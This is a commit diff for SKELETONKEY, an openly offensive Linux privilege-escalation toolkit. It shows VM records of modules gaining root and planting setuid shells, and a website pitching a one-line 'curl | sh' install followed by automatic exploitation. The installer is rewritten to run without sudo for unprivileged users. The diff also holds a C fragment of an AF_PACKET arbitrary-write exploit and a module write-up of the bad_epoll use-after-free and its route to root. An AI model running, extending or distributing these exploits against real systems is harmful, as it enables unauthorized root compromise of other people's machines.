## SKELETONKEY v0.9.8 — two new LPE modules (ptrace_pidfd, sudo_host)
|
||||
|
||||
Adds the two most compelling recent Linux LPEs not already in the corpus,
|
||||
|
||||
@@ -34,3 +34,27 @@
|
||||
{"module":"sudo_runas_neg1","verified_at":"2026-05-24T03:29:18Z","host_kernel":"4.15.0-213-generic","host_distro":"Ubuntu 18.04.6 LTS","vm_box":"generic/ubuntu1804","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
|
||||
{"module":"tioscpgrp","verified_at":"2026-05-24T03:31:08Z","host_kernel":"5.4.0-26-generic","host_distro":"Ubuntu 20.04.6 LTS","vm_box":"generic/ubuntu2004","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
|
||||
{"module":"dirtydecrypt","verified_at":"2026-05-24T05:16:27Z","host_kernel":"6.19.7-061907-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
|
||||
{"module":"refluxfs","verified_at":"2026-07-23T21:45:28Z","host_kernel":"5.14.0-687.10.1.el9_8.0.1.x86_64","host_distro":"Rocky Linux 9.8 (Blue Onyx)","vm_box":"rocky9-genericcloud/qemu-kvm","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
|
||||
{"module":"overlayfs","verified_at":"2026-07-23T00:00:00Z","host_kernel":"5.4.0-26-generic","host_distro":"Ubuntu 20.04 LTS (frozen 20200423)","vm_box":"ubuntu2004-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_OK","root_witness":"uid=0(root); wrote /root/","status":"root"}
|
||||
{"module":"pwnkit","verified_at":"2026-07-23T00:00:00Z","host_kernel":"5.4.0-26-generic","host_distro":"Ubuntu 20.04 LTS (frozen 20200423)","vm_box":"ubuntu2004-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_OK","root_witness":"uid=0(root); wrote /root/ (after gconv-layout fix)","status":"root"}
|
||||
{"module":"sudo_samedit","verified_at":"2026-07-23T00:00:00Z","host_kernel":"5.4.0-26-generic","host_distro":"Ubuntu 20.04 LTS (frozen 20200423), sudo 1.8.31","vm_box":"ubuntu2004-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_FAIL","root_witness":"none — honest fail (heap not landed)","status":"exploit_fail_honest"}
|
||||
{"module":"cgroup_release_agent","verified_at":"2026-07-23T00:00:00Z","host_kernel":"5.4.0-26-generic","host_distro":"Ubuntu 20.04 LTS (frozen 20200423)","vm_box":"ubuntu2004-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_FAIL","root_witness":"none — honest fail (cgroup/userns precondition on this host)","status":"exploit_fail_honest"}
|
||||
{"module":"dirty_pipe","verified_at":"2026-07-23T00:00:00Z","host_kernel":"5.4.0-26-generic","host_distro":"Ubuntu 20.04 LTS (frozen 20200423)","vm_box":"ubuntu2004-cloudimg/qemu-kvm","verified_kind":"detect","expect_detect":"OK","actual_detect":"OK","root_witness":"n/a — 5.4 predates the bug (5.8), correctly not-vulnerable","status":"match"}
|
||||
{"module":"overlayfs_setuid","verified_at":"2026-07-23T00:00:00Z","host_kernel":"5.15.0-25-generic","host_distro":"Ubuntu 22.04.0 (frozen, genuinely vuln - predates Ubuntu 5.15.0-70 fix)","vm_box":"ubuntu2204-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_FAIL","root_witness":"none - module technique broken (chown merged carrier: EPERM); needs CVE-2023-0386 FUSE copy-up PoC port","status":"needs_fix"}
|
||||
{"module":"dirty_pipe","verified_at":"2026-07-23T00:00:00Z","host_kernel":"5.15.0-25-generic","host_distro":"Ubuntu 22.04.0 (frozen)","vm_box":"ubuntu2204-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_FAIL","root_witness":"none - kernel 5.15.0-25.25 likely carries Ubuntu backported fix (USN-5317); detect is version-blind. Needs a pre-fix kernel to verify exploit","status":"inconclusive_backport"}
|
||||
{"module":"ptrace_traceme","verified_at":"2026-07-23T00:00:00Z","host_kernel":"4.15.0-50-generic","host_distro":"Ubuntu 18.04.2 (frozen, genuinely vuln - pre 4.15.0-58 fix)","vm_box":"ubuntu1804-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_OK(FALSE)","root_witness":"NONE - false positive. PTRACE_ATTACH to parent(1) EPERM, wrong technique; reports OK via exec-transfer. Needs CVE-2019-13272 PoC port","status":"false_positive"}
|
||||
{"module":"sudo_samedit","verified_at":"2026-07-23T00:00:00Z","host_kernel":"4.15.0-50-generic","host_distro":"Ubuntu 18.04.2, sudo 1.8.21p2","vm_box":"ubuntu1804-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_FAIL","root_witness":"none - honest fail (heap not landed on this libc)","status":"exploit_fail_honest"}
|
||||
{"module":"sudo_runas_neg1","verified_at":"2026-07-23T00:00:00Z","host_kernel":"4.15.0-50-generic","host_distro":"Ubuntu 18.04.2, sudo 1.8.21p2 + sudoers (ALL,!root) rule","vm_box":"ubuntu1804-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_OK","root_witness":"uid=0(root) via sudo -u#-1; module popped root shell","status":"root"}
|
||||
{"module":"cgroup_release_agent","verified_at":"2026-07-24T00:00:00Z","host_kernel":"5.4.0-26-generic","host_distro":"Ubuntu 20.04.0","vm_box":"ubuntu2004-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_FAIL","root_witness":"none - fixed 2 real bugs (uid_map read post-unshare; missing CLONE_NEWCGROUP). Now sets up userns+cgroupns+mount correctly, but on stock systemd host ALL v1 controllers are pre-mounted (release_agent init-owned=EACCES) and named-hierarchy mount is EPERM. Reachable only in a container context (CAP_SYS_ADMIN / ownable cgroup). Environmental, not a module bug.","status":"env_limited_after_fix"}
|
||||
{"module":"overlayfs_setuid","verified_at":"2026-07-24T00:00:00Z","host_kernel":"5.15.0-25-generic","host_distro":"Ubuntu 22.04.0 (genuinely vuln)","vm_box":"ubuntu2204-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_FAIL","root_witness":"none - non-FUSE chown copy-up gives uid=1000 not root; FUSE-lower overlay mount is ENOSYS in userns. Needs fusermount-in-init-ns FUSE port. Raw /dev/fuse attempt reverted.","status":"needs_fuse_port"}
|
||||
{"module":"sudoedit_editor","verified_at":"2026-07-24T00:00:00Z","host_kernel":"5.15.0-25-generic","host_distro":"Ubuntu 22.04.0, sudo 1.9.9 + sudoers sudoedit grant","vm_box":"ubuntu2204-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_FAIL","root_witness":"none - SUDO_EDITOR/-- injection hits sudoedit writable-dir guard; needs target-file tuning + module debug. Structural, tractable.","status":"needs_debug"}
|
||||
{"module":"sudoedit_editor","verified_at":"2026-07-24T00:00:00Z","host_kernel":"5.15.0-25-generic","host_distro":"Ubuntu 22.04.0, sudo 1.9.9-1ubuntu2 + sudoers sudoedit grant","vm_box":"ubuntu2204-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_OK","root_witness":"uid=0(root) via su skel; /etc/passwd gained skel::0:0 (after 2 fixes: chdir / + helper basename match)","status":"root"}
|
||||
{"module":"sudo_host","verified_at":"2026-07-24T00:00:00Z","host_kernel":"5.15.0-25-generic","host_distro":"Ubuntu 22.04.0, sudo 1.9.9-1ubuntu2 + host-restricted sudoers rule","vm_box":"ubuntu2204-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_OK","root_witness":"uid=0(root) via sudo -h fakehost01; module works as shipped (needs host-restricted rule + resolvable host)","status":"root"}
|
||||
{"module":"nf_tables","verified_at":"2026-07-24T00:00:00Z","host_kernel":"5.15.0-25-generic","host_distro":"Ubuntu 22.04.0","vm_box":"ubuntu2204-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_FAIL","root_witness":"none - offset resolver FIXED (env modprobe_path now resolves + finisher engages + pipapo arb-write fires), but the reconstructed double-free arb-write does not reliably land the write. Honest FAIL. Primitive needs slab-groom hardening.","status":"primitive_fires_no_root"}
|
||||
{"module":"ptrace_traceme","verified_at":"2026-07-24T02:02:00Z","host_kernel":"4.15.0-50-generic","host_distro":"Ubuntu 18.04.0","vm_box":"bionic-cloudimg/qemu-kvm","verified_kind":"reference_poc","exploit_result":"ROOT","root_witness":"out-of-band: uid=0(root) + root-owned setuid /tmp/rootbash written by injected shell. bcoles poc.c (pkexec + PTRACE_TRACEME + inject midpid). Kernel CONFIRMED vulnerable. Barrier was polkit authorization (active-session gate) — isolated via a permissive pkla for the backlight helper action; technique itself works.","status":"kernel_confirmed_technique_works_needs_module_port"}
|
||||
{"module":"ptrace_traceme","verified_at":"2026-07-24T02:12:00Z","host_kernel":"4.15.0-50-generic","host_distro":"Ubuntu 18.04.0","vm_box":"bionic-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_OK","root_witness":"out-of-band: skeletonkey --exploit ptrace_traceme (as uid 1000) planted root-owned /tmp/.sk-ptrace-<pid>.proof and a -rwsr-xr-x root:root setuid bash. Ported the proven Jann Horn/bcoles PoC (embedded, runtime-compiled). Precondition: active local session / permissive polkit so pkexec authorizes the helper (isolated via pkla on the headless VM).","status":"working"}
|
||||
{"module":"sudo_samedit","verified_at":"2026-07-24T02:21:00Z","host_kernel":"4.15.0-50-generic","host_distro":"Ubuntu 18.04.0","sudo_version":"1.8.21p2","libc":"2.27","vm_box":"bionic-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_OK","root_witness":"out-of-band: skeletonkey --exploit sudo_samedit (as uid 1000, non-sudoer path) planted root-owned proof + -rwsr-xr-x root:root setuid bash. Ported blasty CVE-2021-3156 technique (NSS libnss_X hijack), runtime-compiled payload, primary Ubuntu lengths 56/54/63/212 landed first try.","status":"working"}
|
||||
{"module":"dirty_pipe","verified_at":"2026-07-24T02:49:00Z","host_kernel":"5.16.0-051600-generic (mainline, pre-5.16.11 fix)","host_distro":"Ubuntu 22.04 userspace","vm_box":"jammy-cloudimg + mainline 5.16.0/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_OK","root_witness":"out-of-band: skeletonkey --exploit dirty_pipe (uid 1000) planted root-owned proof + -rwsr-xr-x root:root setuid bash; /etc/passwd left byte-identical (root:x:0:0) after revert. Fixed 3 bugs: false EXPLOIT_OK, wrong escalation (was flipping own UID + su self), and drop_caches revert that corrupted running passwd. New technique: root passwd-field hash + su over pty + Dirty-Pipe revert.","status":"working"}
|
||||
{"module":"dirty_cow","verified_at":"2026-07-24T03:22:00Z","host_kernel":"4.8.0-040800-generic (mainline, pre-4.8.3 Dirty COW fix)","host_distro":"Ubuntu 16.04.7","vm_box":"xenial-cloudimg + mainline 4.8.0/qemu-kvm","verified_kind":"exploit_standalone","exploit_result":"EXPLOIT_OK","root_witness":"out-of-band on a genuinely Dirty-COW-vulnerable kernel: standalone binary built from the module verbatim (dirty_cow_write primitive + find_pw_field_offset + robust poll/timeout dc_su_root_run + exploit body) — race won, su root via pty, planted root-owned proof + -rwsr-xr-x root:root setuid bash, /etc/passwd byte-identical after revert. Confirms the fix (correct escalation, OOB verify, safe revert, readback[512], robust su) lands real root end-to-end. Full skeletonkey binary would not build on xenials 4.4-era uapi headers (unrelated nft_* modern constants).","status":"working"}
|
||||
{"module":"overlayfs","verified_at":"2026-07-24T03:36:00Z","host_kernel":"5.4.0-26-generic","host_distro":"Ubuntu 20.04.0","vm_box":"focal-cloudimg/qemu-kvm","verified_kind":"exploit","exploit_result":"EXPLOIT_OK","root_witness":"out-of-band: skeletonkey --exploit overlayfs (uid 1000) — the cap_setuid payload now drops a root-owned proof + -rwsr-xr-x root:root setuid bash; module reports OK only after stat() confirms uid==0. Upgraded from getxattr proxy to direct witness.","status":"working"}
|
||||
{"module":"netfilter_xtcompat","verified_at":"2026-07-24T04:00:00Z","host_kernel":"5.4.0-26-generic + mainline 5.8.0","host_distro":"Ubuntu 20.04.0","vm_box":"focal-cloudimg (+mainline 5.8.0)/qemu-kvm","verified_kind":"reference_poc_attempt","exploit_result":"REFERENCE_POC_TARGET_MISMATCH","root_witness":"none. CVE-2021-22555 kernel confirmed vulnerable (5.4.0-26 and mainline 5.8.0, both pre-fix). Andy Nguyen public exploit consistently fails STAGE 1 (could not corrupt any primary message) on both mainline kernels — it is tuned for Ubuntu 5.8.0-48-generics exact slab config (freelist-random/memcg). Confirms primitives need exact-target kernel+config + per-target tuning, not drop-in.","status":"primitive_needs_exact_target_kernel"}
|
||||
|
||||
+1
-1
@@ -10,7 +10,7 @@
|
||||
* 1. typed install command in the hero
|
||||
* ============================================================ */
|
||||
const installCmd =
|
||||
'curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh \\\n && skeletonkey --auto --i-know';
|
||||
'curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh \\\n && export PATH="$HOME/.local/bin:$PATH" \\\n && skeletonkey --auto --i-know';
|
||||
const typedEl = document.getElementById('install-typed');
|
||||
const cursorEl = document.getElementById('install-cursor');
|
||||
|
||||
|
||||
+23
-18
@@ -4,16 +4,16 @@
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<title>SKELETONKEY — Linux LPE corpus, VM-verified, SOC-ready detection</title>
|
||||
<meta name="description" content="One binary. 41 Linux privilege-escalation modules from 2016 to 2026. 28 of 36 CVEs empirically verified in real Linux VMs. 10 KEV-listed. 151 detection rules across auditd/sigma/yara/falco. MITRE ATT&CK and CWE annotated. --explain gives operator briefings.">
|
||||
<meta name="description" content="One binary. 46 Linux privilege-escalation modules from 2016 to 2026. 29 of 41 CVEs empirically verified in real Linux VMs. 13 KEV-listed. 151 detection rules across auditd/sigma/yara/falco. MITRE ATT&CK and CWE annotated. --explain gives operator briefings.">
|
||||
<meta property="og:title" content="SKELETONKEY — Linux LPE corpus, VM-verified">
|
||||
<meta property="og:description" content="41 Linux LPE modules; 28 of 36 CVEs empirically verified in real VMs. 151 detection rules. ATT&CK + CWE + KEV annotated.">
|
||||
<meta property="og:description" content="46 Linux LPE modules; 29 of 41 CVEs empirically verified in real VMs. 151 detection rules. ATT&CK + CWE + KEV annotated.">
|
||||
<meta property="og:type" content="website">
|
||||
<meta property="og:url" content="https://karazajac.github.io/SKELETONKEY/">
|
||||
<meta property="og:image" content="https://karazajac.github.io/SKELETONKEY/og.png">
|
||||
<meta property="og:url" content="https://skeletonkey.netslum.io/">
|
||||
<meta property="og:image" content="https://skeletonkey.netslum.io/og.png?v=2">
|
||||
<meta property="og:image:width" content="1200">
|
||||
<meta property="og:image:height" content="630">
|
||||
<meta name="twitter:card" content="summary_large_image">
|
||||
<meta name="twitter:image" content="https://karazajac.github.io/SKELETONKEY/og.png">
|
||||
<meta name="twitter:image" content="https://skeletonkey.netslum.io/og.png?v=2">
|
||||
<meta name="theme-color" content="#0a0a14">
|
||||
|
||||
<link rel="preconnect" href="https://fonts.googleapis.com">
|
||||
@@ -56,14 +56,14 @@
|
||||
<div class="container hero-inner">
|
||||
<div class="hero-eyebrow">
|
||||
<span class="dot dot-pulse"></span>
|
||||
v0.9.8 — released 2026-06-02
|
||||
v0.10.0 — released 2026-07-24
|
||||
</div>
|
||||
<h1 class="hero-title">
|
||||
<span class="display-wordmark">SKELETONKEY</span>
|
||||
</h1>
|
||||
<p class="hero-tag">
|
||||
One binary. <strong>41 Linux LPE modules</strong> covering 36 CVEs —
|
||||
<strong>every year 2016 → 2026</strong>. 28 of 34 confirmed against
|
||||
One binary. <strong>46 Linux LPE modules</strong> covering 41 CVEs —
|
||||
<strong>every year 2016 → 2026</strong>. 29 of 41 confirmed against
|
||||
real Linux kernels in VMs. SOC-ready detection rules in four SIEM
|
||||
formats. MITRE ATT&CK + CWE + CISA KEV annotated.
|
||||
<span class="hero-tag-pop">--explain gives a one-page operator briefing per CVE.</span>
|
||||
@@ -81,9 +81,9 @@
|
||||
</div>
|
||||
|
||||
<div class="stats-row" id="stats-row">
|
||||
<div class="stat-chip"><span class="num" data-target="41">0</span><span>modules</span></div>
|
||||
<div class="stat-chip stat-vfy"><span class="num" data-target="28">0</span><span>✓ VM-verified</span></div>
|
||||
<div class="stat-chip stat-kev"><span class="num" data-target="12">0</span><span>★ in CISA KEV</span></div>
|
||||
<div class="stat-chip"><span class="num" data-target="46">0</span><span>modules</span></div>
|
||||
<div class="stat-chip stat-vfy"><span class="num" data-target="29">0</span><span>✓ VM-verified</span></div>
|
||||
<div class="stat-chip stat-kev"><span class="num" data-target="13">0</span><span>★ in CISA KEV</span></div>
|
||||
<div class="stat-chip"><span class="num" data-target="151">0</span><span>detection rules</span></div>
|
||||
</div>
|
||||
|
||||
@@ -227,7 +227,7 @@ uid=0(root) gid=0(root)</pre>
|
||||
<div class="bento-icon">★</div>
|
||||
<h3>CISA KEV prioritized</h3>
|
||||
<p>
|
||||
12 of 36 CVEs in the corpus are in CISA's Known Exploited
|
||||
13 of 41 CVEs in the corpus are in CISA's Known Exploited
|
||||
Vulnerabilities catalog — actively exploited in the wild.
|
||||
Refreshed on demand via <code>tools/refresh-cve-metadata.py</code>.
|
||||
</p>
|
||||
@@ -289,12 +289,12 @@ uid=0(root) gid=0(root)</pre>
|
||||
|
||||
<article class="bento-card bento-vfy">
|
||||
<div class="bento-icon">✓</div>
|
||||
<h3>22 modules empirically verified</h3>
|
||||
<h3>29 modules empirically verified</h3>
|
||||
<p>
|
||||
<code>tools/verify-vm/</code> spins up known-vulnerable
|
||||
kernels (stock distro + mainline from kernel.ubuntu.com), runs
|
||||
<code>--explain --active</code> per module, and records the
|
||||
verdict. <strong>28 of 36 CVEs</strong> confirmed against
|
||||
verdict. <strong>29 of 41 CVEs</strong> confirmed against
|
||||
real Linux across Ubuntu 18.04 / 20.04 / 22.04 + Debian 11 / 12
|
||||
+ mainline 5.4.0-26 / 5.15.5 / 6.1.10 / 6.19.7. Records baked into the binary;
|
||||
<code>--list</code> shows ✓ per module.
|
||||
@@ -309,7 +309,7 @@ uid=0(root) gid=0(root)</pre>
|
||||
<div class="container">
|
||||
<div class="section-head">
|
||||
<span class="section-tag">corpus</span>
|
||||
<h2>36 CVEs across 10 years. ★ = actively exploited (CISA KEV).</h2>
|
||||
<h2>41 CVEs across 10 years. ★ = actively exploited (CISA KEV).</h2>
|
||||
</div>
|
||||
|
||||
<h3 class="corpus-h" data-color="green">
|
||||
@@ -356,6 +356,11 @@ uid=0(root) gid=0(root)</pre>
|
||||
<span class="pill yellow">sequoia</span>
|
||||
<span class="pill yellow">vmwgfx</span>
|
||||
<span class="pill yellow">ptrace_pidfd</span>
|
||||
<span class="pill yellow">cifswitch</span>
|
||||
<span class="pill yellow">nft_catchall</span>
|
||||
<span class="pill yellow">bad_epoll</span>
|
||||
<span class="pill yellow">ghostlock</span>
|
||||
<span class="pill yellow">refluxfs</span>
|
||||
</div>
|
||||
|
||||
<p class="corpus-foot">
|
||||
@@ -416,7 +421,7 @@ uid=0(root) gid=0(root)</pre>
|
||||
<div class="audience-icon">🎓</div>
|
||||
<h3>Researchers / CTF</h3>
|
||||
<p>
|
||||
36 CVEs, 10-year span, each with the original PoC author
|
||||
41 CVEs, 10-year span, each with the original PoC author
|
||||
credited and the kernel-range citation auditable.
|
||||
<code>--explain</code> shows the reasoning chain; detection
|
||||
rules let you practice both sides. Source is the documentation.
|
||||
@@ -513,7 +518,7 @@ uid=0(root) gid=0(root)</pre>
|
||||
<div class="tl-col tl-shipped">
|
||||
<div class="tl-tag">shipped</div>
|
||||
<ul>
|
||||
<li><strong>28 of 36 CVEs empirically verified</strong> in real Linux VMs</li>
|
||||
<li><strong>29 of 41 CVEs empirically verified</strong> in real Linux VMs</li>
|
||||
<li><strong>kernel.ubuntu.com/mainline/</strong> kernel fetch path — unblocks pin-not-in-apt targets</li>
|
||||
<li>Per-module <code>verified_on[]</code> table baked into the binary</li>
|
||||
<li><strong>--explain mode</strong> — one-page operator briefing per CVE</li>
|
||||
@@ -600,7 +605,7 @@ uid=0(root) gid=0(root)</pre>
|
||||
who found the bugs.
|
||||
</p>
|
||||
<p class="footer-meta">
|
||||
v0.9.8 · MIT · <a href="https://github.com/KaraZajac/SKELETONKEY">github.com/KaraZajac/SKELETONKEY</a>
|
||||
v0.9.11 · MIT · <a href="https://github.com/KaraZajac/SKELETONKEY">github.com/KaraZajac/SKELETONKEY</a>
|
||||
</p>
|
||||
</div>
|
||||
</footer>
|
||||
|
||||
BIN
Binary file not shown.
|
Before Width: | Height: | Size: 123 KiB After Width: | Height: | Size: 73 KiB |
+1
-1
@@ -80,6 +80,6 @@
|
||||
|
||||
<!-- subtle url at very bottom -->
|
||||
<text x="1120" y="610" font-family="'JetBrains Mono',monospace" font-size="14" fill="#5b5b75" text-anchor="end">
|
||||
karazajac.github.io/SKELETONKEY
|
||||
skeletonkey.netslum.io
|
||||
</text>
|
||||
</svg>
|
||||
|
||||
|
Before Width: | Height: | Size: 4.0 KiB After Width: | Height: | Size: 4.0 KiB |
+38
-14
@@ -28,7 +28,11 @@ set -eu
|
||||
|
||||
REPO="${SKELETONKEY_REPO:-KaraZajac/SKELETONKEY}"
|
||||
VERSION="${SKELETONKEY_VERSION:-latest}"
|
||||
PREFIX="${SKELETONKEY_PREFIX:-/usr/local/bin}"
|
||||
# PREFIX resolution is deferred until install time so we can pick a
|
||||
# sudo-free default. SKELETONKEY is a privilege-escalation tool — by
|
||||
# definition the operator does NOT have root yet, so the installer must
|
||||
# NEVER need sudo. Empty here means "auto-pick a writable dir below".
|
||||
PREFIX="${SKELETONKEY_PREFIX:-}"
|
||||
|
||||
log() { printf '[\033[1;36m*\033[0m] %s\n' "$*" >&2; }
|
||||
ok() { printf '[\033[1;32m+\033[0m] %s\n' "$*" >&2; }
|
||||
@@ -108,29 +112,49 @@ fi
|
||||
|
||||
chmod +x "$tmp/skeletonkey"
|
||||
|
||||
# Install. Try $PREFIX directly; if not writable, sudo.
|
||||
target_path="$PREFIX/skeletonkey"
|
||||
if [ -w "$PREFIX" ] || [ "$(id -u)" -eq 0 ]; then
|
||||
mv "$tmp/skeletonkey" "$target_path"
|
||||
elif command -v sudo >/dev/null 2>&1; then
|
||||
log "$PREFIX needs sudo; you may be prompted for password"
|
||||
sudo mv "$tmp/skeletonkey" "$target_path"
|
||||
# Choose install dir — NEVER escalate to sudo. If the user pinned
|
||||
# SKELETONKEY_PREFIX we honor it exactly (creating it if needed) and
|
||||
# error rather than escalate when it isn't writable. Otherwise prefer
|
||||
# /usr/local/bin only when it happens to already be writable, and fall
|
||||
# back to a guaranteed per-user dir ($HOME/.local/bin) that needs no
|
||||
# privileges. This keeps `curl ... | sh` password-free for the exact
|
||||
# users this tool is meant for: unprivileged accounts.
|
||||
if [ -n "$PREFIX" ]; then
|
||||
[ -d "$PREFIX" ] || mkdir -p "$PREFIX" 2>/dev/null \
|
||||
|| fail "cannot create SKELETONKEY_PREFIX=$PREFIX"
|
||||
[ -w "$PREFIX" ] || fail "SKELETONKEY_PREFIX=$PREFIX not writable (the installer never uses sudo — pick a writable dir)"
|
||||
elif [ -w /usr/local/bin ]; then
|
||||
PREFIX=/usr/local/bin
|
||||
else
|
||||
fail "$PREFIX not writable and sudo not available. Try SKELETONKEY_PREFIX=\$HOME/.local/bin"
|
||||
PREFIX="${XDG_BIN_HOME:-$HOME/.local/bin}"
|
||||
mkdir -p "$PREFIX" 2>/dev/null || fail "cannot create $PREFIX"
|
||||
fi
|
||||
|
||||
target_path="$PREFIX/skeletonkey"
|
||||
mv "$tmp/skeletonkey" "$target_path" || fail "failed to install to $target_path"
|
||||
ok "installed: $target_path"
|
||||
|
||||
# ~/.local/bin is frequently absent from PATH on fresh accounts — tell
|
||||
# the user how to invoke it rather than letting `skeletonkey` 404.
|
||||
case ":$PATH:" in
|
||||
*":$PREFIX:"*) : ;;
|
||||
*) log "note: $PREFIX is not on \$PATH — run it as $target_path, or add the dir to PATH" ;;
|
||||
esac
|
||||
|
||||
"$target_path" --version
|
||||
|
||||
cat >&2 <<EOF
|
||||
|
||||
[\033[1;33m!\033[0m] AUTHORIZED TESTING ONLY — see https://github.com/${REPO}/blob/main/docs/ETHICS.md
|
||||
|
||||
Quickstart:
|
||||
sudo skeletonkey --scan # what's this box vulnerable to?
|
||||
sudo skeletonkey --audit # broader system hygiene
|
||||
sudo skeletonkey --detect-rules --format=auditd \\
|
||||
| sudo tee /etc/audit/rules.d/99-skeletonkey.rules # deploy detection rules
|
||||
Quickstart (no root required — gaining it is the point):
|
||||
skeletonkey --scan # what's this box vulnerable to?
|
||||
skeletonkey --audit # broader system hygiene
|
||||
skeletonkey --auto --i-know # run the safest available LPE
|
||||
|
||||
Deploy detection rules (defensive; only the write to /etc/audit needs root):
|
||||
skeletonkey --detect-rules --format=auditd \\
|
||||
| sudo tee /etc/audit/rules.d/99-skeletonkey.rules
|
||||
|
||||
See \`skeletonkey --help\` for all commands.
|
||||
EOF
|
||||
|
||||
@@ -449,6 +449,12 @@ static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vc
|
||||
pid_t p = fork();
|
||||
if (p < 0) return -1;
|
||||
if (p == 0) {
|
||||
/* Capture the OUTER uid/gid BEFORE unshare: after
|
||||
* unshare(CLONE_NEWUSER) getuid()/getgid() return 65534 (nobody),
|
||||
* so a post-unshare map is "0 65534 1" which the kernel rejects
|
||||
* with EPERM and the userns-root mapping silently fails. */
|
||||
unsigned outer_uid = (unsigned)getuid();
|
||||
unsigned outer_gid = (unsigned)getgid();
|
||||
if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) _exit(2);
|
||||
int fd;
|
||||
fd = open("/proc/self/setgroups", O_WRONLY);
|
||||
@@ -456,13 +462,13 @@ static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vc
|
||||
fd = open("/proc/self/uid_map", O_WRONLY);
|
||||
if (fd >= 0) {
|
||||
char m[64];
|
||||
int n = snprintf(m, sizeof m, "0 %u 1", (unsigned)getuid());
|
||||
int n = snprintf(m, sizeof m, "0 %u 1", outer_uid);
|
||||
(void)!write(fd, m, n); close(fd);
|
||||
}
|
||||
fd = open("/proc/self/gid_map", O_WRONLY);
|
||||
if (fd >= 0) {
|
||||
char m[64];
|
||||
int n = snprintf(m, sizeof m, "0 %u 1", (unsigned)getgid());
|
||||
int n = snprintf(m, sizeof m, "0 %u 1", outer_gid);
|
||||
(void)!write(fd, m, n); close(fd);
|
||||
}
|
||||
int rc = af_packet2_primitive_child(c->ictx);
|
||||
|
||||
@@ -0,0 +1,106 @@
|
||||
# bad_epoll — CVE-2026-46242
|
||||
|
||||
"Bad Epoll" — a race-condition use-after-free in the Linux kernel epoll
|
||||
subsystem (`fs/eventpoll.c`) reachable by **any unprivileged local user**.
|
||||
No user namespace, no capability, no special `CONFIG` — `epoll_create1(2)`,
|
||||
`epoll_ctl(2)`, and `close(2)` are available to everyone, which is what
|
||||
makes this bug unusually dangerous.
|
||||
|
||||
## The bug
|
||||
|
||||
On the file-teardown path, `ep_remove()` clears `file->f_ep` under
|
||||
`file->f_lock` but keeps **using** the file inside the same critical
|
||||
section — the `hlist_del_rcu()` walk over the eventpoll's `refs` list and
|
||||
the trailing `spin_unlock()`. A concurrent `__fput()` of a linked epoll
|
||||
file can observe the transient `NULL` `f_ep`, skip
|
||||
`eventpoll_release_file()`, and jump straight to `f_op->release`, freeing
|
||||
a `struct eventpoll` that the first path is still walking →
|
||||
**use-after-free** on a live kernel object.
|
||||
|
||||
The public exploit (Jaeyoung Chung, submitted to Google's kernelCTF)
|
||||
arranges four epoll objects in two pairs — one pair drives the race, the
|
||||
other is the victim — and converts the 8-byte UAF write into control of a
|
||||
`struct file` via a **cross-cache** attack (the freed `eventpoll` slab
|
||||
page is drained to the buddy allocator and reclaimed as pipe backing
|
||||
buffers). From there it reads arbitrary kernel memory through
|
||||
`/proc/self/fdinfo` and ROPs to a root shell. Roughly **99% reliable**
|
||||
despite a race window only ~6 instructions wide; the racer widens it with
|
||||
`close(dup())` storms that induce false-sharing on the file's `f_count`
|
||||
cache line. It **rarely trips KASAN**, which is why the bug survived three
|
||||
years and why it is hard to detect at runtime.
|
||||
|
||||
## Affected range
|
||||
|
||||
| | |
|
||||
|---|---|
|
||||
| Vulnerable path introduced | commit `58c9b016e128` — Linux **6.4** (2023-04-08) |
|
||||
| Fixed upstream | commit `a6dc643c69311677c574a0f17a3f4d66a5f3744b` — merged for **7.1-rc1** (2026-04-24) |
|
||||
| Stable backport | **7.0.13** (Debian forky `7.0.13-1` / sid `7.0.14-1`) |
|
||||
| Still vulnerable at time of writing | trixie **6.12.x** (no backport yet); 6.6 LTS pending |
|
||||
| Not affected | 6.1 and older (predate the bug — Debian: "vulnerable code not present") |
|
||||
| NVD class | CWE-416 (Use After Free) via CWE-362 (race) |
|
||||
| CISA KEV | no (brand new) |
|
||||
|
||||
Table threshold is a single `{7,0,13}` entry — `kernel_range_is_patched()`
|
||||
treats 7.1+ as patched-via-mainline and everything in `[6.4, 7.0.13)` as
|
||||
vulnerable, matching the Debian tracker. Add 6.6.x / 6.12.x rows when
|
||||
those LTS backports land (`tools/refresh-kernel-ranges.py` flags them).
|
||||
|
||||
## Trigger / detection
|
||||
|
||||
`detect()` is a **pure version gate** — no active probe, because there is
|
||||
no cheap, safe way to distinguish a vulnerable kernel from a patched one
|
||||
without actually winning the race (the dangerous part). It returns `OK`
|
||||
